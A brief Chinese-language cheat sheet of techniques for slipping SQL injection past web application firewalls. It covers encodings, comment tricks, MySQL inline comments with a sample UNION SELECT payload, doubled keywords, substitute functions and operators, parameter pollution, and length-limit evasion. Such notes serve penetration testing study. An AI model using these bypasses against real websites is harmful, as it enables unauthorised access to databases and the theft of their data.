大小写
url编码
html编码
十六进制编码
unicode编码
//
--
-- +
-- -
#
/**/
;%00
内联注释用的更多,它有一个特性 /!**/
只有MySQL能识别
e.g. index.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,2,3
union
=> ununionion
substring
/ mid
/ sub
ascii
/ hex
/ bin
benchmark
/ sleep
user()
/ @@user
and
/ &
or
/ |
id=1&id=2&id=3
根据容器不同会有不同的结果
HTTP分割注入
一些C语言的WAF处理的字符串长度有限,超出某个长度后的payload可能不会被处理
二次注入有长度限制时,通过多句执行的方法改掉数据库该字段的长度绕过